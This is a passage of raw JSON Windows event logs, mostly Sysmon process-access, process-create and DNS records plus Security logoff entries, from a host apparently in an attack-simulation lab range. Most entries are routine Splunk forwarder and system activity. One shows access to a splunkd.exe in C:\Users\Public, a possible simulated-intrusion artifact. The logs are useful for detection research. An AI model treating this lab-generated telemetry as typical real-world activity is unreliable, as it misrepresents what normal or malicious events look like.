C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.772\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110D-5F25-0000-00105BF00500}\r\nTargetProcessId: 4128\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:57.772","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110D-5F25-0000-00105BF00500}","TargetProcessId":"4128","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4120,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.310\r\nProcessGuid: {E2A3D6B1-110B-5F25-0000-00104ED30500}\r\nProcessId: 3884\r\nQueryName: win-dc-8400769\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.310","ProcessGuid":"{E2A3D6B1-110B-5F25-0000-00104ED30500}","QueryName":"win-dc-8400769","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","EventReceivedTime":"2020-08-01 06:51:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220392,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45479\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45479","LogonType":"3","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220393,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x44CA8\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x44ca8","LogonType":"3","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.429\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.429","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.445\r\nProcessGuid: {E2A3D6B1-110E-5F25-0000-00100CF20500}\r\nProcessId: 4156\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Performance monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-perfmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.445","ProcessGuid":"{E2A3D6B1-110E-5F25-0000-00100CF20500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","FileVersion":"8.0.2","Description":"Performance monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-perfmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110E-5F25-0000-00100CF20500}\r\nTargetProcessId: 4156\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110E-5F25-0000-00100CF20500}","TargetProcessId":"4156","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110E-5F25-0000-00100CF20500}\r\nTargetProcessId: 4156\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110E-5F25-0000-00100CF20500}","TargetProcessId":"4156","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 